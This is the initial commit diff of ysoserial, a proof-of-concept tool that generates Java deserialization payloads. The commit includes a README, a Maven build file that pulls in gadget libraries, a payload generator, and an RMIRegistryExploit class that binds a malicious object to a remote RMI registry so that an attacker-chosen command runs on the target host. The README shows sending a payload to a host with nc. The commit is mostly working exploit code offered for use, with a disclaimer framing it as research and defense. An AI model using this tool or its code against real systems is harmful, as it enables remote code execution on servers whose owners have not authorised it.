init-commit

.gitignore

@@ -0,0 +1,5 @@
+/target
+.classpath
+.project
+.settings/
+pwntest

.travis.yml

@@ -0,0 +1,7 @@
+language: java
+jdk:
+  - oraclejdk8
+  - openjdk8  
+  - oraclejdk7
+  - openjdk7
+  - openjdk6

DISCLAIMER.txt

@@ -0,0 +1,6 @@
+DISCLAIMER
+
+This software has been created purely for the purposes of academic research and
+for the development of effective defensive techniques, and is not intended to be
+used to attack systems except where explicitly authorized. Project maintainers 
+are not responsible or liable for misuse of the software. Use responsibly.

LICENSE.txt

@@ -0,0 +1,22 @@
+Copyright (c) 2013 Chris Frohoff
+
+MIT License
+
+Permission is hereby granted, free of charge, to any person obtaining
+a copy of this software and associated documentation files (the
+"Software"), to deal in the Software without restriction, including
+without limitation the rights to use, copy, modify, merge, publish,
+distribute, sublicense, and/or sell copies of the Software, and to
+permit persons to whom the Software is furnished to do so, subject to
+the following conditions:
+
+The above copyright notice and this permission notice shall be
+included in all copies or substantial portions of the Software.
+
+THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
+EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
+MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
+NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
+LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
+OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
+WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

README.md

@@ -0,0 +1,66 @@
+
+# ysoserial 
+
+A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
+
+![](https://github.com/frohoff/ysoserial/blob/master/ysoserial.png)
+
+## Description
+
+ysoserial is a collection of utilities and property-oriented programming "gadget chains" discovered in common java 
+libraries. The main driver program takes a user-specified command and wraps it in the user-specified gadget chain, then
+serializes these objects to stdout. When an application with the required gadgets on the classpath unsafely deserializes
+this data, the chain will automatically be invoked and cause the command to be executed on the application host.
+
+It should be noted that the vulnerability lies in the application performing unsafe deserialization and NOT in having
+gadgets on the classpath.
+
+## Disclaimer
+
+This software has been created purely for the purposes of academic research and
+for the development of effective defensive techniques, and is not intended to be
+used to attack systems except where explicitly authorized. Project maintainers 
+are not responsible or liable for misuse of the software. Use responsibly.
+
+## Usage
+
+```shell
+$ java -jar ysoserial-0.0.1-all.jar
+Y SO SERIAL?
+Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'
+        Available payload types:
+                CommonsCollections1
+                CommonsCollections2
+                Groovy1
+                Spring1           
+```
+
+## Examples
+
+```shell
+$ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd
+0000000: aced 0005 7372 0032 7375 6e2e 7265 666c  ....sr.2sun.refl
+0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41  ect.annotation.A
+0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174  nnotationInvocat
+...
+0000550: 7672 0012 6a61 7661 2e6c 616e 672e 4f76  vr..java.lang.Ov
+0000560: 6572 7269 6465 0000 0000 0000 0000 0000  erride..........
+0000570: 0078 7071 007e 003a                      .xpq.~.:
+
+$ java -jar ysoserial-0.0.1-all.jar Groovy1 calc.exe > groovypayload.bin
+$ nc 10.10.10.10 < groovypayload.bin
+
+$ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe
+```
+
+## Installation
+
+1. Download the latest jar from the "releases" section.
+
+## Contributing
+
+1. Fork it
+2. Create your feature branch (`git checkout -b my-new-feature`)
+3. Commit your changes (`git commit -am 'Add some feature'`)
+4. Push to the branch (`git push origin my-new-feature`)
+5. Create new Pull Request

pom.xml

@@ -0,0 +1,125 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+
+	<groupId>ysoserial</groupId>
+	<artifactId>ysoserial</artifactId>
+	<version>0.0.1-SNAPSHOT</version>
+	<packaging>jar</packaging>
+
+	<name>ysoserial</name>
+	<url>http://maven.apache.org</url>
+
+	<properties>
+		<project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+	</properties>
+
+	<build>
+		<plugins>
+			<plugin>
+				<groupId>org.apache.maven.plugins</groupId>
+				<artifactId>maven-compiler-plugin</artifactId>
+				<version>3.2</version>
+				<configuration>
+					<source>1.5</source>
+					<target>1.5</target><!-- maximize compatibility -->					
+				</configuration>
+			</plugin>
+			<plugin>
+				<artifactId>maven-assembly-plugin</artifactId>
+				<configuration>
+				    <finalName>${project.artifactId}-${project.version}-all</finalName>
+					<appendAssemblyId>false</appendAssemblyId>				    				
+					<archive>					
+						<manifest>
+							<mainClass>ysoserial.GeneratePayload</mainClass>
+						</manifest>
+					</archive>
+					<descriptorRefs>
+						<descriptorRef>jar-with-dependencies</descriptorRef>
+					</descriptorRefs>
+				</configuration>
+				<executions>
+					<execution>
+						<id>make-assembly</id>
+						<phase>package</phase>
+						<goals>
+							<goal>single</goal>
+						</goals>
+					</execution>
+				</executions>
+			</plugin>
+		</plugins>
+	</build>
+
+	<dependencies>
+
+		<!-- testing depedencies -->
+
+		<dependency>
+			<groupId>junit</groupId>
+			<artifactId>junit</artifactId>
+			<version>4.12</version>
+			<scope>test</scope>
+		</dependency>
+		<dependency>
+			<groupId>org.mockito</groupId>
+			<artifactId>mockito-core</artifactId>
+			<version>1.10.19</version>
+			<scope>test</scope>
+		</dependency>
+		<dependency>
+			<groupId>com.github.stefanbirkner</groupId>
+			<artifactId>system-rules</artifactId>
+			<version>1.8.0</version>
+			<scope>test</scope>
+		</dependency>
+
+		<!-- non-gadget dependencies -->
+
+		<dependency>
+			<groupId>org.reflections</groupId>
+			<artifactId>reflections</artifactId>
+			<version>0.9.9</version>
+		</dependency>
+		<dependency>
+			<groupId>org.jboss.shrinkwrap.resolver</groupId>
+			<artifactId>shrinkwrap-resolver-depchain</artifactId>
+			<version>2.1.1</version>
+			<type>pom</type>
+		</dependency>
+
+		<!-- gadget dependecies -->
+
+		<dependency>
+			<groupId>commons-collections</groupId>
+			<artifactId>commons-collections</artifactId>
+			<version>3.1</version>
+		</dependency>
+		<dependency>
+			<groupId>org.apache.commons</groupId>
+			<artifactId>commons-collections4</artifactId>
+			<version>4.0</version>
+		</dependency>		
+		<dependency>
+			<groupId>org.apache.commons</groupId>
+			<artifactId>commons-lang3</artifactId>
+			<version>3.1</version>
+		</dependency>
+		<dependency>
+			<groupId>org.codehaus.groovy</groupId>
+			<artifactId>groovy</artifactId>
+			<version>2.3.9</version>
+		</dependency>
+		<dependency>
+			<groupId>org.springframework</groupId>
+			<artifactId>spring-core</artifactId>
+			<version>4.1.4.RELEASE</version>
+		</dependency>
+		<dependency>
+			<groupId>org.springframework</groupId>
+			<artifactId>spring-beans</artifactId>
+			<version>4.1.4.RELEASE</version>
+		</dependency>
+	</dependencies>
+</project>

src/main/java/ysoserial/Deserialize.java

@@ -0,0 +1,18 @@
+package ysoserial;
+
+import java.io.File;
+import java.io.FileInputStream;
+import java.io.IOException;
+import java.io.InputStream;
+
+import ysoserial.payloads.util.Serializables;
+
+/*
+ * for testing payloads across process boundaries
+ */
+public class Deserialize {
+	public static void main(final String[] args) throws ClassNotFoundException, IOException {
+		final InputStream in = args.length == 0 ? System.in : new FileInputStream(new File(args[0]));
+		Serializables.deserialize(in);
+	}
+}

src/main/java/ysoserial/GeneratePayload.java

@@ -0,0 +1,86 @@
+package ysoserial;
+
+import java.io.ObjectOutputStream;
+import java.util.ArrayList;
+import java.util.Collection;
+import java.util.Collections;
+import java.util.Comparator;
+import java.util.List;
+import java.util.Set;
+
+import org.reflections.Reflections;
+
+import ysoserial.payloads.ObjectPayload;
+
+@SuppressWarnings("rawtypes")
+public class GeneratePayload {
+
+	private static final int INTERNAL_ERROR_CODE = 70;
+	private static final int USAGE_CODE = 64;
+
+	public static void main(final String[] args) {
+		if (args.length != 2) {
+			printUsage();
+			System.exit(USAGE_CODE);
+		}
+		final String payloadType = args[0];
+		final String command = args[1];
+
+		final Class<? extends ObjectPayload> payloadClass = getPayloadClass(payloadType);
+		if (payloadClass == null || !ObjectPayload.class.isAssignableFrom(payloadClass)) {
+			System.err.println("Invalid payload type '" + payloadType + "'");
+			printUsage();
+			System.exit(USAGE_CODE);
+		}
+
+		try {
+			final ObjectPayload payload = payloadClass.newInstance();
+			final Object object = payload.getObject(command);
+			final ObjectOutputStream objOut = new ObjectOutputStream(System.out);
+			objOut.writeObject(object);
+		} catch (Exception e) {
+			System.err.println("Error while generating or serializing payload");
+			e.printStackTrace();
+			System.exit(INTERNAL_ERROR_CODE);
+		}		
+		System.exit(0);		
+	}
+
+	@SuppressWarnings("unchecked")
+	private static Class<? extends ObjectPayload> getPayloadClass(final String className) {
+		try {
+			return (Class<? extends ObjectPayload>) Class.forName(className);				
+		} catch (Exception e1) {		
+		}
+		try {
+			return (Class<? extends ObjectPayload>) Class.forName(GeneratePayload.class.getPackage().getName() 
+				+ ".payloads."  + className);
+		} catch (Exception e2) {				
+		}			
+		return null;		
+	}
+
+	private static void printUsage() {
+		System.err.println("Y SO SERIAL?");
+		System.err.println("Usage: java -jar ysoserial-[version]-all.jar [payload type] '[command to execute]'");
+		System.err.println("\tAvailable payload types:");	
+		final List<Class<? extends ObjectPayload>> payloadClasses = 
+			new ArrayList<Class<? extends ObjectPayload>>(getPayloadClasses());
+		Collections.sort(payloadClasses, new ToStringComparator()); // alphabetize
+		for (Class<? extends ObjectPayload> payloadClass : payloadClasses) {
+			System.err.println("\t\t" + payloadClass.getSimpleName());
+		}
+	}
+
+	// get payload classes by classpath scanning
+	private static Collection<Class<? extends ObjectPayload>> getPayloadClasses() {
+		final Reflections reflections = new Reflections(GeneratePayload.class.getPackage().getName());
+		final Set<Class<? extends ObjectPayload>> payloadTypes = reflections.getSubTypesOf(ObjectPayload.class);		
+		return payloadTypes;
+	}	
+
+	public static class ToStringComparator implements Comparator<Object> {
+		public int compare(Object o1, Object o2) { return o1.toString().compareTo(o2.toString()); }
+	}	
+
+}

src/main/java/ysoserial/RMIRegistryExploit.java

@@ -0,0 +1,23 @@
+package ysoserial;
+
+import java.rmi.Remote;
+import java.rmi.registry.LocateRegistry;
+import java.rmi.registry.Registry;
+
+import ysoserial.payloads.CommonsCollections1;
+import ysoserial.payloads.ObjectPayload;
+import ysoserial.payloads.util.Gadgets;
+
+/*
+ * Utility program for exploiting RMI registries running with required gadgets available in their ClassLoader
+ */
+public class RMIRegistryExploit {
+	public static void main(String[] args) throws Exception {
+		Registry registry = LocateRegistry.getRegistry(args[0], Integer.parseInt(args[1]));		
+		String className = CommonsCollections1.class.getPackage().getName() +  "." + args[2];
+		Class<? extends ObjectPayload> payloadClass = (Class<? extends ObjectPayload>) Class.forName(className);
+		Object payload = payloadClass.newInstance().getObject(args[3]);
+		Remote remote = Gadgets.createMemoitizedProxy(Gadgets.createMap("pwned", payload), Remote.class);
+		registry.bind("pwned", remote);		
+	}
+}